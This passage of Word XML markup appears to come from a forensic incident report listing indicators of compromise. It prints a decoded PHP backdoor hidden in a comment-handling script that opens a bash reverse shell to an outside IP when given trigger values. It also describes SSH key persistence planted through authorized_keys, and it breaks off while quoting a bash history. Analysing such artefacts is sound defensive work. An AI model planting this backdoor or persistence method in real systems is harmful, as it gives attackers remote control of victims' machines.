              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1EB5E453" wp14:editId="43050F75">
                  <wp:extent cx="4145029" cy="279275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b="28143"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4145029" cy="2792750"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5290F30A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aa"/>
        <w:tblW w:w="84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0"/>
        <w:gridCol w:w="7260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="568D8178" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DC89D54" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34485910" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t>/home/it_consultant/vese-projects-code/websites/php/test_comment.php, line 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="39F8F760" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DACBD73" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36ECAAFC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>PHP reverse shell, base64 encoded; might have been used to achieve code execution on the target machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306866F4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30427D93" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="342EC409" wp14:editId="01236085">
                  <wp:extent cx="4476750" cy="21082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4476750" cy="2108200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D84F91" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62711503" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Decoded content of the reverse shell for the remote IP 158.46.250.151:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273FFBCB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="ab"/>
              <w:tblW w:w="70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60"/>
            </w:tblGrid>
            <w:tr w:rsidR="00BC1FF2" w14:paraId="7BAC9D35" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7060" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
                  <w:tcMar>
                    <w:top w:w="100" w:type="dxa"/>
                    <w:left w:w="100" w:type="dxa"/>
                    <w:bottom w:w="100" w:type="dxa"/>
                    <w:right w:w="100" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="5CAB7436" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>//426ce929ea051285e551eaf2b2de2bf463ae78456fa3b64adb5fd2214d985e34</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="389610D0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>if ($name == "test1" &amp;&amp; $email == "test@test.com" &amp;&amp; $message == "test2</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>"){</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="700FC331" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>system(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>"bash -c 'bash -</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>i</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>/158.46.250.151/9001 0&gt;&amp;1'");</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="27C02185" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="10D2A264" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2817F404" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F36E103" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="17630057" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac"/>
        <w:tblW w:w="84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0"/>
        <w:gridCol w:w="7260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5BE0434B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C10D1B0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3C491CBD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5A6988BD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45827CC5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39F97A51" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A public SSH key has been added to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file, which could be linked with unauthorized access due to the content of the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>bash_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file, shown below, demonstrating the execution of suspicious commands. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>In particular a</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file is downloaded from an unknown remote origin (IP 54.17.234.165) and appended to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file, which would allow an unknown actor to gain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> access to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> user. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D64CB8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6249F9C5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moreover, the described commands are preceded and followed by calls to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>mount</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> program </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>in order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> mount/unmount an external drive on the machine, which could determine that the origin of these commands is in fact a physical device that was at some point connected in order to exploit the target, by gaining </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> access to the currently logged in user.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFFECFB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The following content was found inside the /home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bash_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57334108" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="ad"/>
              <w:tblW w:w="70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60"/>
            </w:tblGrid>
            <w:tr w:rsidR="00BC1FF2" w14:paraId="24EE8CCB" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7060" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
                  <w:tcMar>
                    <w:top w:w="100" w:type="dxa"/>
                    <w:left w:w="100" w:type="dxa"/>
                    <w:bottom w:w="100" w:type="dxa"/>
                    <w:right w:w="100" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="6452C6AA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>[15/11/2022-04:34:01] rm /home/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>eliseo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>/.</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>bash_history</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="569C6423" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve">[15/11/2022-04:34:06] </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t>mkdir</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /media/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
